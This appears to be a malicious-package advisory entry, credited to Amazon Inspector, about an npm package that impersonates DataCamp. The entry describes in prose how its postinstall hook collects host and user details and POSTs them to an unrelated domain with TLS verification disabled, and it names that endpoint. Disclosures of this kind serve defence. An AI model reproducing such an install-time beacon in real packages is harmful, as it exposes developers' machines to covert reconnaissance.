MAL-2026-6091

--- _-= Per source details. Do not edit below this line.=-_

## Source: amazon-inspector (4dbdcc4ef12aca6461f8e765976a7b2b33099a1791a7aee7e353371b7954a91c) Package impersonates the DataCamp brand while shipping near-empty stub exports (index.js `init`/`helper` return trivial constants). The postinstall lifecycle hook (`node install.js`) runs on every `npm install` and collects the installer's hostname, OS username, home directory, platform, current working directory, and timestamp, then POSTs them over HTTPS to `dc.iam.c.noratomo.asia/install` with TLS certificate verification disabled (`rejectUnauthorized: false`). The destination domain has no relationship to datacamp.com. The combination of brand-impersonating name, hollow library functionality, lifecycle-triggered outbound beacon to an unrelated domain, identifying-host fields, and disabled TLS verification is a supply-chain reconnaissance implant against developers who install this expecting DataCamp tooling.